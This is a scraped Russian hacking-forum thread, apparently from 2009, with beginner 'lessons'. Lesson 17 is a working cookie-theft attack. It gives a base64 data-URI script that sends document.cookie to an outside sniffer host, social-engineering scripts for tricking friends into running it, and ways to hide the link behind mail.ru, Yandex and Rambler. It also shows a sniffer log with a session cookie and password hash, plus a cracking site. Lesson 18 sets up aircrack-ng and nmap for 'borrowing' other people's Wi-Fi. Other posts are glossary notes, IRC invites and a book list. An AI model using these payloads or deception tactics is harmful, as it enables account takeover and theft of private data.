Symposium), и SOCKS стал публично доступным. Протокол был расширен до четвёртой версии Ин-Да Ли (Ying-Da Lee) из NEC Systems Laboratory.
8).Оболочка операционной системы (от англ. shell — оболочка) — интерпретатор команд операционной системы (ОС), обеспечивающий интерфейс для взаимодействия
пользователя с функциями системы. В общем случае, различают оболочки с двумя типами интерфейса для взаимодействия с пользователем: интерфейс командной строки (CLI) и
графический пользовательский интерфейс (GUI)
http://ru.wikipedia.org/wiki/Shell_(командная_строка)
9).Сетевой порт — параметр протоколов TCP и UDP, определяющий назначение пакетов данных в формате IP, передаваемых на хост по сети.Это условное число от 1 до 65535,
позволяющие различным программам, выполняемым на одном хосте, получать данные независимо друг от друга (предоставляют так называемые сетевые сервисы). Каждая
программа обрабатывает данные, поступающие на определённый порт (иногда говорят, что программа «слушает» этот номер порта).Обычно за некоторыми распространёнными
сетевыми протоколами закреплены стандартные номера портов (например, веб-серверы обычно принимают данные по протоколу HTTP на TCP-порт 80), хотя в большинстве случаев
программа может использовать любой порт.
Порт 20 используется для передачи данных, порт 21 для передачи команд.
10).Оновное отличие троянов от вирусов заключается в следующем: вирусы самодостаточны а трояны должны связоватся сосвоим автором. таким образом если в борьбе с
вирусами есть только один способ - их вылавливать и уничтожать то для защиты от троянов можно перекрыть их возможность связи с автором.Ещё одно отличие - вирусы
встраиваются в нормальные программы после чего при запуске заражонной программы сначала выполняется код вируса а потом вирус выполняет настоящею программу. Трояны
же выполняются в виде отдельного файла.
http://books.google.com/books?id=_7y4-aRqpOkC&amp;pg=PA342&amp;lpg=PA342&amp;dq=Отличие между Тро%
8F%D0%BD+%D0%B8+%D0%92%D0%B8%D1%80%D1%83%D1%81&source=web&ots=MpAKwSEdDD&sig=cJROx3feclJEGMITJpFxjDvvwac&hl=ru&sa=X&oi=book_result&resnum=6&ct=result
11).DNS (англ. Domain Name System — система доменных имён) — распределённая система (распределённая база данных), способная по запросу, содержащему доменное имя хоста
(компьютера или другого сетевого устройства), сообщить IP адрес или (в зависимости от запроса) другую информацию. DNS работает в сетях TCP/IP. Как частный случай, DNS
может хранить и обрабатывать и обратные запросы, определения имени хоста по его IP адресу: IP адрес по определённому правилу преобразуется в доменное имя, и посылается
запрос на информацию типа "PTR".
http://ru.wikipedia.org/wiki/DNS
12).а вот на вопрос Тунэль , Тунэлирование (что это такое , где используется), и касательно порта 111 не нашол может подскажеж.
бальшое спасибо за тему! не знаю как поставить +,первый раз пользуюсь подобными вещами
Урок 17.

XSS II ВОССТАНИЕ САМОДОСТАТОЧНЫХ.

Сегодня я хочу рассказать вам о очень мало используемой уязвимости...
но при этом не менее опасной...эта уязвимость называется  самодостаточные XSS.
Называется эта уязвимость самодостаточной потому , что не требует наличия уязвимости на ресурсе...
Сразу сделаю примечание...эта уязвимость не работает в Internet Explorer 6 и 7ой версии...но это не проблемма в наши дни...так как ими пользуются всё меньше и меньше людей...
Более подробно об этой уязвимости вы можете прочитать здесь http://www.securitylab.ru/analytics/274302.php // Это чтобы не повторяться.

Всё что нужно , чтобы эта уязвимость заработала...так это чтобы человек(атакуемый) перешёл по ссылке(с того сайта с которого мы хотим стащить Cookies) вот такого вида....
[link=http://forum.xakep.ru/m_1224792/mpage_28/data:text/html;base64,PHNjcmlwdD4gYWxlcnQoIlhha2VwOTAwOV9SdWxseiIpOyA8L3NjcmlwdD4=]data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=[/link]
Конечно вы скажете , что никто не перейдёт по такой подозрительной ссылке...
Но ведь мы можем всегда спрятать её.....и вот несколько способов.
1)Прячем ссылку нашим любимым способом через тэг
<a href="Наша_подозрительная_ссылка">Халявные ICQ</a>
//На форумах это используется при помощи тэгов [link ] [/link] и -- алгоритм тот же...
2)Прячем ссылку в картинке!
<a href="Наша_ссылка"><IMG src="Любая_ссылка_на_картинку.jpg"></a>
На форумах это делается при помощи всё тех же тэгов [IMG src="image.jpg"]

Вот собственно пару примеров....как можно замаскировать наши "Ядовитые" ссылки....
Но! бывают и случаи когда вы хотите попасть на почту своей девушки....или знакомого друга....

В этих случаях прятать ссылку необязательно....главное применить СИ (социальная инженерия)....
Вот пример как я "ввожу в доверие" моих друзей\подруг\знакомых.
Пишу:
_____________________________________________________
Привет ...посмотри прикол....который я нашёл ....зайди на сайт (сайт с которого мне надо украсть куккисы, допустим mail.ru) и вставь в адресную строку (там где ты печатаешь ссылки) вот это :

javasсriрt:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=1024; y4=768; x5=1024; y5=768; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)
И нажми энтор.
______________________________________________________

Когда она\он вставляет в адресную строку и жмёт энтор этот код....она\он видит летающие картинки с этого сайта...что обычных юзеров приводит в восторг....и под этим чувством мы "впихиваем" ссылку с нашим вредным кодом.
Пример:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=

И когда жертва говорит, что у неё пустая страница...мы с удивлением говорим...
"Вот досада видимо у тебя браузер не поддерживает этого прикола...=("
А сами идём на сниффер....на котором у нас уже лежат Кукисы жертвы. 

Теперь я думаю тактика вам становиться понятна...
Ну а чтобы вы на практике поняли как она работает.....и как она опасна....(эта уязвимость)
Приведу примеры использования...на "скромных ресурсах РУ нета"

1)Угоняем на время mail.ru

И так...нам надо спрятать нашу длинную ссылку в письме....
Но нажав на расширенный формат---Добавить ссылку на сайт или страницу интернет и вставляя нашу ссылку...мы видим облом...ибо нам пишут ошибку "Неправильный формат ссылки"

Мы бы расстроились и пошли плакать...если бы мы небыли хакерами =)
Но так как мы хакеры...мы догадались.....раз у нас не получается добавить скрытую ссылку через "службы" сайта....то сделаем через наши "службы"...

А именно.....создаём html страничку вот с таким кодом.
____________________________________
<html>
<bоdу>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=">Ссылка!=)</a>
</bоdу>
</html>
____________________________________

Сохраняем и открываем в нашем браузере.....и видим нашу скрытую ссылку....вот в таком виде....
Ссылка!=) копируем этот текст....и вставляем в наше письмо.....как вы видите...к нам ни единых претензий не предъявили....
Вот мы и спрятали нашу длинную ссылку.....

Тоже самое можно проделать с картинкой...!!!а это гораздо эффективнее.....скопируйте этот html код , сохраните и откройте...потом поймёте почему эффективнее   
__________________________________________________________
<html>
<bоdу>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4="><image src=http://www.ljplus.ru/img3/p/r/prosto_irishka/IMGP1599-.jpg></a>
</bоdу>
</html>
__________________________________________________________

2)Угоняем на время yandex.ru

Что касается Яндекса...
Ничего умнее чем редирект я не нашёл....
Редирект - это перенаправление с одного сайта на другой.....
и вот что у меня получилось....
http://mail.yandex.ru/r?url=data:text/h … NjcmlwdD4=

Но это не единственный способ....поищите другие....допустим с картинками...я не пробовал....уверен у вас получиться найти больше чем я нашёл =).

3)Угоняем на время Rambler.ru
Rambler на удивление оказался тоже стоикий....
Могу вам сказать...что сначала я искал редиректы.....собственно я нашёл один...
http://www.rambler.ru/click?from=mail&_URL=[наш_любой_сайт]
Вы можете использовать её для перенаправления жертвы на ваш фейк...о котором я писал ранее....
хотя это не единственный редирект...который я нашёл....
http://www.rambler.ru/click?from=mltopl … ш_сайт.ru/
Но эти редиректы ...не связанны с сайтом rambler.ru....вы это можете обнаружить из заголовка вылетающей ошибки....там где атака проходит удачно ...вылетает окно с титлом от сайта...чьи кукисы мы хотим получиьт...

После 10 мин копания я ничего не нашёл....и утешил себя...что даже опытные пользователи не смогли бы заметить наглый редирект на фейковскую страничку....

А теперь вы можете задать мне вопрос.....зачем нам дурацкая ошибка которая вылетает с твоим ником?
Всё просто....это как и в стандартном XSS мы сначало проверяли на наличие уязвимостей....а теперь можем переделать в настоящую ядовитую ссылку....и делается это просто....

На прошлих уроках я вас не просто так...познакомил с одним из видов шифрования под названием base64 .
А самодостаточные XSS и основаны на том , что закодированы в этот вид шифрования....чтобы вам стало яснее приведу пример.

Вот я писал.....
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=
где выдиленая часть это чистая кодировка base64 не верите....разкодируйте тут http://www.motobit.com/util/base64-decoder-encoder.asp
и вы получите <sсriрt>alert('Xakep9009_Rullz')</sсriрt>
Узнаёте стандартную XSS?

А теперь что мешает нам "впихнуть" вместо "Шуточного" кода "Ядовитый".
Допустим такой....
<sсriрt>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</sсriрt>
Ничего...
Кодируем...в base64 и получаем на выходе:

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vb2xkLmFudGljaGF0
LnJ1L2NnaS1iaW4vcy5qcGc/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+

И дальше делаем всё по схеме =)

А теперь давайте представим , что мы хотим угнать контакт.

Да....именно тот который Vkontakte.ru

Делается это очень легко.....
Входим в доверие к нашей жертве....просим вставить в адресную строку

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vb2xkLmFudGljaGF0LnJ1L2NnaS1iaW4vcy5qcGc/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+

А сами в это время сидим и ждём на логе сниффера....
http://old.antichat.ru/sniff/log.php

Обновляем лог ...и видим что-то примерно такое....
[Wed Jan 14 23:33:31 2009] IP=81.158.225.252 SITE=
REFERER=
QUERY=remixlang=0; remixchk=5; remixclosed_tabs=0; remixautobookmark=6; remixgroup_closed_tabs=0; remixmid=2520472; remixemail=Xakep9009@Gmail.com; remixpass=cb570d109f5e4583f43f7a551e9e6db9; remixsid=e0b5e7a938255698a0afddcd64351293d527dfb1eca1d2f0c7d78c55
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5



где значение remixemail Это логин (Xakep9009@gmail.com) , а remixpass наш пароль....зашифрованный в md5 .....который вы можете попытаться разшифровать... тут http://passcracking.com/index.php ну а remixid это номер идентификатор...контакта который вы ломанули....

Ну и даже если у вас не получилось ломануть вы всегда можете посидеть с этой странички....при помощи замены Cookies...про которую я тоже писал...в первом уроке про XSS.
Вывод
1)Мы узнали про очень забытую уязвимость...и которая от этого становится в тройне опасной.
2)Мы узнали, что даже если у нас есть недосигаемые сайты такие как Gmail или Vkontakte мы можем всегда обмануть систему.
3)Вспомнили про методы шифрования md5 и base64
4)Научились быть Самодостаточными и использовать это 
5)Узнали и научились обходить ограничения сайта подручными средствами (Пример с Ctrl+C и Ctrl+v в mail).
7)Еще раз убедились что СИ мощнейшее оружие Хакера(Пример с летающими картинками)
6)И наконец осознали , что XSS это мега уязвимость!

________________________________________________________________________________________________________________________

Думаю , что на этом достаточно....
Видео к этому Уроку....
Сразу скажу весит много.... 53МБ идёт 5 минут....
Поэтому кто сам во всём разобрался скачивать нету смысла...файл такой большой получится...потому как я сделал акцент на качество.....меня лично раздрожают фидео ролики кде кроме квадратов ничего не разглядишь....
Да и файл в формате wmv
http://webfile.ru/2564653

Надеюсь вы узнали что-то новое для себя или повторили старое.
Удачи!

< Сообщение отредактировано Xakep9009 -- 19.01.2009 0:19:14 >
bhychik@bhychik-laptop:~$ su
Password:
root@bhychik-laptop:/home/bhychik# sudo airmon-ng

Interface Chipset Driver

eth1 UNKNOWN wl

root@bhychik-laptop:/home/bhychik# sudo airmon-ng start eth1

Interface Chipset Driver

eth1 UNKNOWN wl (monitor mode enabled)

root@bhychik-laptop:/home/bhychik# sudo airodump-ng eth1
ioctl(SIOCSIWMODE) failed: Invalid argument

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
Sysfs injection support was not found either.

Вот ещё логи
Iwconfig:

lo        no wireless extensions.

eth0      no wireless extensions.

eth1      IEEE 802.11bg  ESSID:""  Nickname:""
          Mode:Managed  Frequency:2.457 GHz  Access Point: Not-Associated   
          Bit Rate:54 Mb/s   Tx-Power:32 dBm   
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Power Managementmode:All packets received
          Link Quality=5/5  Signal level=0 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

eth2      no wireless extensions.

pan0      no wireless extensions.

Ispci лог:

00:00.0 Host bridge: Advanced Micro Devices [AMD] RS780 Host Bridge
00:01.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (int gfx)
00:04.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 0)
00:07.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 3)
00:09.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 4)
00:11.0 SATA controller: ATI Technologies Inc SB700/SB800 SATA Controller [IDE mode]
00:12.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller
00:12.1 USB Controller: ATI Technologies Inc SB700 USB OHCI1 Controller
00:12.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller
00:13.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller
00:13.1 USB Controller: ATI Technologies Inc SB700 USB OHCI1 Controller
00:13.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller
00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 3a)
00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA)
00:14.3 ISA bridge: ATI Technologies Inc SB700/SB800 LPC host controller
00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge
00:14.5 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI2 Controller
00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 11h HyperTransport Configuration (rev 40)
00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 11h Address Map
00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 11h DRAM Controller
00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 11h Miscellaneous Control
00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 11h Link Control
01:05.0 VGA compatible controller: ATI Technologies Inc RS780M/RS780MN [Radeon HD 3200 Graphics]
02:00.0 Ethernet controller: Marvell Technology Group Ltd. Device 4357 (rev 10)
06:00.0 Network controller: Broadcom Corporation BCM4312 802.11b/g (rev 01)

lsusb лог

Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 007 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 005 Device 002: ID 03f0:171d Hewlett-Packard Wireless (Bluetooth + WLAN) Interface [Integrated Module]
Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 002 Device 003: ID 09da:000a A4 Tech Co., Ltd Port Mouse
Bus 002 Device 002: ID 07b2:5101 Motorola BCS, Inc. SurfBoard SB5101 Cable Modem
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 006 Device 002: ID 04f2:b083 Chicony Electronics Co., Ltd
Bus 006 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

Дорогие друзья!!!
Существует irc-канал, на котором вы можете задавать свои вопросы, обсуждать статьи, найти единомышленников и многое другое.
Приходите, мы ждём вас. Давайте договоримся когда основная масса народа будет собираться, ну не может чат пустовать.

Сервер: irc.rus-net.org
Канал: #9009
Кодировка:6667: KOI8-U 7771: CP1251 7775: Translit
Так как идёт разногласие в кодировках, то предлагаю выбрать (написано).

< Сообщение отредактировано free_kode -- 28.01.2009 20:34:27 >
Дорогие друзья!!!
Существует irc-канал, на котором вы можете задавать свои вопросы, обсуждать статьи, найти единомышленников и многое другое.
Приходите, мы ждём вас. Давайте договоримся когда основная масса народа будет собираться, ну не может чат пустовать.

Сервер: irc.rus-net.org
Канал: #9009
Кодировка: CP1251
Порт: 6669 (коннектимся к нему и кодировку менять не надо)
Смена кодировки происходит набором /quote codepage cp1251 вот этой команды (набирать команду в чате, когда вы зашли на канал)
Отдыхаю.
Нектороые IRC-клиенты не поддерживают данную кодировку, советую использовать mIRC

< Сообщение отредактировано free_kode -- 22.02.2009 17:29:59 >
Просмотрел всю тему и ужаснулся - в этой куче хлама нереально что-то найти, потратил полчаса, вдруг кому поможет ориентироваться

http://forum.xakep.ru/m_1224792/mpage_1/tm.htm - 1-3 уроки
http://forum.xakep.ru/m_1224792/mpage_2/tm.htm - 4-6 уроки
http://forum.xakep.ru/m_1224792/mpage_4/tm.htm - 7 урок
http://forum.xakep.ru/m_1224792/mpage_6/tm.htm - 8 урок
http://forum.xakep.ru/m_1224792/mpage_7/tm.htm - 9-10 уроки
http://forum.xakep.ru/m_1224792/mpage_11/tm.htm - 11 урок
http://forum.xakep.ru/m_1224792/mpage_13/tm.htm - 12 урок
http://forum.xakep.ru/m_1224792/mpage_16/tm.htm - 13 урок
http://forum.xakep.ru/m_1224792/mpage_20/key_/tm.htm - 14 урок
http://forum.xakep.ru/m_1224792/mpage_24/tm.htm - 15 урок
http://forum.xakep.ru/m_1224792/mpage_26/tm.htm - 16 урок
http://forum.xakep.ru/m_1224792/mpage_28/tm.htm - 17 урок

вот все уроки которые описаны в данной теме...
Доки по С/С++
1. "Справочник советов и примеров по C++ Builder"
Автор:Кононевич Станислав
Size:27 Кб
http://www.biblioteka.net.ru/data/download/cbuilder.chm

2. "Освой самостоятельно С++ за 21 день"
http://alelib.amillo.net/books/0/0/4/4/ … 1Days.djvu

3. Modern C++ Design
Автор:Andrei Alexandrescu
Size:1.2 Mb
http://anatolix.naumen.ru/files/books/moderncpp.zip

+Современное проектирование на C++
Автор:Андрей Александреску
Size:4.1 Mb
http://anatolix.naumen.ru/files/books/m … gn_rus.zip

4. C++ Standard Library, The: A Tutorial and Reference
Автор:Nicolai M. Josuttis
Size:3.5Mb
http://anatolix.naumen.ru/files/books/cppstdlib.zip

5. C++ Templates: The Complete Guide
By David Vandevoorde, Nicolai M. Josuttis
Size:0.7Mb
http://anatolix.naumen.ru/files/books/cpptemplates.zip

6. Effective STL
Автор:Scott Meyers
Size:1.2Mb
http://anatolix.naumen.ru/files/books/effstl.zip

7. International Standart ISO/IEC ISO/IEC 9899:1999 (E)
Programming languages — C
Size:1.1 Mb
http://anatolix.naumen.ru/files/books/iso9899.zip

8. Автор:Brian W. Kernighan, Dennis M. Ritchie
The C programming Language. Second Edition.
Size:170K
http://anatolix.naumen.ru/files/books/kr_eng.zip

Автор:Б. Керниган, Д. Ритчи
Язык программирования Си
Size:300K
http://anatolix.naumen.ru/files/books/kr_rus.zip

http://anatolix.naumen.ru/files/books/k … er_eng.zip

9. Автор:Stanley Lippman (Стенли Липпман)
Essential C++(Основы программирования на С++.)
Size:1.2 Mb
http://anatolix.naumen.ru/files/books/l … pp_eng.zip

10. Автор:Stanley Lippman,Josee Lajoie
C++ Primer
Size:2.6 Mb
http://anatolix.naumen.ru/files/books/l … er_eng.zip

+Автор:Стенли Липпман,Жози Лажойе
Язык программирования С++. Вводный курс
Size:0.8 Mb
http://anatolix.naumen.ru/files/books/l … er_rus.zip

11. Автор:Herb Sutter
Exceptional C++,
Size:0.3 Mb
http://anatolix.naumen.ru/files/books/e … al_cpp.zip
More Exceptional C++
Size:0.5 Mb
http://anatolix.naumen.ru/files/books/m … al_cpp.zip

12. Автор:Dov Bulka, David Mayhew
Efficient C++ Performance Programming Techniques
Size:1.5 Mb
http://anatolix.naumen.ru/files/books/efficient_cpp.zip

13. Правила программирования на C и C++
Автор:Allen I. Holub
[link=http://webcenter.ru/%7Ezwb/rope.htm]http://webcenter.ru/~zwb/rope.htm[/link]

14. Автор:Bjarne Stroustrup
The C++ Programming Language, Third Edition. Special Edition
Size:3.9 Mb
http://it-books.narod.ru/C_CPP/Stroustrup_eng.rar

Автор:Бьерн Страуструп
Язык программирования C++. 3-е издание. Специальное издание.
Size:2.9 Mb
http://anatolix.naumen.ru/files/books/s … oup_se.zip

15. Автор:Джефф Элджер
C++ Библиотека программиста
Size:1.8 Mb
http://it-books.narod.ru/C_CPP/CppForRe … rs_rus.rar

16. Автор:Scott Meyers
Effective C++, 2nd Edition: 50 Specific Ways to Improve Your Programs and
Designs
Size:4.1 Mb
http://it-books.narod.ru/C_CPP/effectiv … ivecpp.rar

17. Автор:Scott Meyers
More Effective C++: 35 More Ways to Improve Your Programs and Designs
Size:4.1 Mb
http://it-books.narod.ru/C_CPP/effectiv … ivecpp.rar

18. INTERNATIONAL STANDARD
Programming languages - C++ ISO/ANSI/EIC
Size:2.3 Mb
http://it-books.narod.ru/C_CPP/AnsiStandart_eng.rar
=======================================
Взято с HackZona.ru
З.Ы.
Если надо литературу по языках то в нашем воруме есть раздел
называется "Програмирование". А если там нет того что тебе нужно
то поисковиком пользуйся

Можно пропустить.
_______________________________________________________________
Всех с прошедшими праздниками!
Конечно я их провёл не так как бы хотелось(болел) но всётаки...
Не писал так долго потому как готовился к пересдаче английского....
что у меня так и не получилось =\
В этом уроке я расскажу как безболезненно пересесть с Windows XP - Vista
на Ubuntu при этом не просто пересесть, но еще установить хакерский набор
тулз на все случаи жизни...
_______________________________________________________________

Урок 18.

Linux

Первое с чего надо начать это что такое Linux и для чего он мне нужен?
Linux  - http://ru.wikipedia.org/wiki/Linux

А нужен Linux для нескольких важных целей....
1)Изучение структуры и работы Linux
2)Если вы будете ездить в европу с вашим ноутбуком там где установлена пиратская винда с вас могут взять огромный штраф и вплоть до срока
(С моего друга в Америке взяли штраф 400$ за то что его поймали в супермарките! с пиратской виндой)
3)Перед вами сразу откроется огромный прастор в плане хакерского ПО.
4)Большая часть сис админов уже сидит под такими видами ОС как Rad Hat, Mandriva , Ubuntu Server итд... так что игнорировать Linux мы больше не в состоянии....

Ubuntu 8.10

На момент написания этого урока 8.10 является самой новой версией Ubuntu....
скачать которую можно c официального сайта....
http://www.ubuntu.com/getubuntu/download
Весит эта ОС 700 МБ
  Преимущество заключается в том что эта операционная система предназначена для начинающих пользователей Linux , но это не значит , что ей пользуются только новички....она сама по себе очень удобна и легка в установке.
Что самое главное вы можете установить Ubuntu прямо под виндой! (открыв скачанный архив .iso ) а там должен лежать файл wubi.exe
  Открываете его.... после чего вы можете с лёгкостью установить Ubuntu (Разобраться как это сделать вы сможете)
//Лично я ставил Ubuntu как основную ось а на неё наложил уже Windows XP как это сделать будет описано ниже.
После того как вы успешно установили Ubuntu при перезагрузке компьютера у вас будет несколько вариантов
1)Ubuntu 8.10
2)Windows XP - Vista (ну или что там у вас ^^)
Ну и выбираете вариант 1 загружаетесь под Ubuntu выбираете второй под XP...

_____________________________________________________________________________________________
Для тех кто выбрал Ubuntu как основную ось....после того как вы установили её у вас возникнет вопрос....как же быть с моим принтером или CS (контра)?
Решение есть.....
VirtualBox - это бесплатная программа которая позволяет создавать виртуальные машины в основной ОС
http://www.virtualbox.org/wiki/Linux_Downloads
//привыкайте что в Linux нет платных программ.....(платный аналог, но уже под Windows vmware workstation)
И так ....после того как вы скачали VirtualBox в формате .deb и открыв его менеджером архивов он вам предложит его установить...нажав кнопку install вас ждёт разочарование.....так как вам нужны права root которых у вас пока нету....
Приобретаем права root
Чтобы разблокировать и поставить пароль на учётную запись root вам нужно
System--Администрирование--Пользователи и группы--нажать на root и потом на кнопку unlock(после чего вас попросят ввести ваш пароль(от вашей учётной записи))
После того как ввели пароль....вы можете изменять настройки учётной записи root (нам нужно поставить пароль).
Нажимаем на root и потом Properties -- Password (вводите ваш пароль на учётную запись 2 раза)--OK
всё. теперь мы можем выполнять команды от пользователя root

Возвращаемся к установке ....жмём install нас просят пароль от root.... вводим....и выполняем установку.....после того как мы установили перезагружаем компьютер и видим во вкладке Applications--Системные
Sun xVM VirtualBox это и есть наша программа.....теперь надо сделать чтобы наш пользователь мог пользоваться этой программой....
System--Администрирование--Пользователи и группы--Unlock--Manage Groups -- (ищите vboxusers)--Propetis--и ставите галку над вашим пользователем и над root....теперь можно приступать....

VirtualBox
Открываем Sun xVM VirtualBox и попробуем установить Windows XP
Создать--Далее--Даёте любое имя(у меня Xwindows) тип ОС Mirosoft Windows версия Windows XP--Далее(размер основной памяти можете оставить как есть)--Создать(Динамически расширяемый образ диска)ставите сколько вам нужно места под винду...жмёте Далее--Готово

После чего в основном окне появится Xwindows--жмём Свойства--CD/DVD-ROM--Подключить CD/DVD(далее если вы устанавливаете Windows с диска то
Физический CD/DVD-привод , а если с образа (iso) то Файл ISO-образа (и выбираете путь где находится этот образ)--ОК
Далее жмёте старт....и устанавливаете по такой же схеме как обычно....

После того как вы установили Windows и загрузитесь.....(попробуйте вставить флешку).....}=) и увидите ,что эту флешку Винда не видит....выполните эти действия и у вас всё получится...
http://jedi-linux.blogspot.com/2008/03/ … albox.html тут всё подробно описано....

Второй очень нужный нам момент это взаимосвязь Ubuntu и Windows , а именно....общяя папка(разшаренная папка)(для того чтобы мы могли быстро перекидываться файлами...)
Делается это очень просто....
1)Когда мы находимся в Windows жмём Ctrl+Home и выходим с полноэкранного режима--Машина--Полноэкранный режим
После чего у вас появятся в верхнем поле такие поля Машина, Устройства, Справка.
2)Жмём Устройства--Установить дополнения Гостевой ОС(устанавливаем эти дополнения и выключаем вирт машину...)//Кстати в этом пункте (Устройства вы можете в реальном времени подключать и отключать устройства от ОС)
3)Далее идём в вашу корневую папку...(на убунту) она еще называется Home Folder и создаём там папку под названием full (имя можете поменять если хотите)
4)Заходим в Sun xVM VirtualBox--Xwindows--Свойства--Общие папки--(нажимаем на папку с плюсиком)--Путь к папке(Другой) и выбираем путь до папки....у меня он получился такой /home/xakep9009/full--Ок
5)Загружаем Винду и вот что делаем...
Пуск--Выполнить-- net use x: \\vboxsvr\full   <-имя папки -- Ok
После чего у вас появится "Сетевой диск"(тобишь папка которая будет работать как в Ubuntu так и в Windows)

VirtualBox мы с вами настроили....теперь как истинные Хакеры мы должны установить MySQL+PHP+Perl+phpMyadmin для наших опытов...(в Linux эта связка называется LAMP)

LAMP

Для того чтобы с лёгкостью установить сервер....(localhost) нам нужно иметь подключение к интернету....(поэтому в большей степени повезёт тем у кого ноутбуки...с настройкой WiFi им париться не придётся.....ну а если у вас декстоп....придётся помучиться и полазят по форумам....ибо у каждого собственные настройки...)

Уточняю (если вы всё еще не отошли от виртуальных машин) дальнейшие действия происходят в Ubuntu.

Открываем консоль(командная строка)....

Applications--Стандартные--Терминал

После чего в терминале пишем....

sudo apt-get install lamp-server^

Пишем пароль который вы ставили для пользователя root....и жмём Enter
Вот и всё! Теперь у нас работает PHP и MySQL (кстати perl в Ubuntu по умолчанию уже есть....)

Если вы еще не знаете(или не помните) что означают эти команды....то давайте разберём....так как они у вас будут встречаться очень часто
1)sudo -это команда для того чтобы выполнять действия от пользователя root
(если бы мы её не написали...нам бы выдали ошибку...что у нас мало прав на выполнение установки....эта команда всегда используется когда надо отредактировать или установить файлы.....)

0

6

2)apt-get install -эта команда для установки пакетов которые располагаются в репозитариях(в убунту по дефалту уже существует некоторое количество стандартных репозитариев....)
Чтобы было легче понять....приведу пример...
На серваки\репозитарии лежит файл....который называется mc...вам надо его установить...и вместо того чтобы лазить по интернету и искать его....вы можете набрать sudo apt-get install mc (после чего ваш комп начнёт рыскать по репозитариям и если он найдёт такой файл...он начнёт его устанавливать...(кстати установите эту программу она очень удобная и нужная....чтобы открыть её нужно в командной строке написать mc)
\\Добавлять репозитарии вы можете вручную для этого...System--Администрирование--Источники приложений--Third-Party Software--+Add

Ну и еще один пример для закрепления....
Когда вам надо будет отредактировать системный файл...или файл с повышенными правами
то делаем это так sudo gedit '\var\somefile.x'
Где gedit это стандартное приложение для редактирования текстовых документов...(по сути мы могли бы просто щёлкнуть два раза по somefile.x и начать его редактировать...но как только мы захотели бы его сохранить нас бы послали....на ошибку ^^.

Извините что пришлось к этому возвращаться....но это очень важный момент который вам еще много раз поможет...
и так....отлично localhost у нас работает....но не будем же мы работать с MySQL без PhpMyAdmin....

sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

После чего у нас будет рабочий phpmyadmin проверить это можно набрав в браузере http://localhost/phpmyadmin
Сам сайт располагается в этой дерриктории /var/www

После этого как уважающий себя хакер мы должны установить пакет aircrack-ng (для взлома Wifi Сетей)
Взлом Wifi сетей я описывал тут http://forum.xakep.ru/m_1224792/mpage_6/key_/tm.htm
А установка делается очень просто....

sudo apt-get install aircrack-ng

Ну и естественно как мы можем узнать кого нам надо атаковать если у нас нету сканера сетей....nmap - это сканер локальных сетей устанавливается и используется очень легко....

sudo apt-get install nmap     //Это установка

nmap 192.168.1.1-225       //Это использование

(после чего он начинает сканировать сеть на наличие подключённых компов и выводит IP этих компов....и открытые порты!)
Приведу пример....после того как я "позаимствовал" WiFi сеть....я первым делом начинаю сканирование на наличие подключённых компов....и для того чтобы определить на каком IP расположен роутер.....
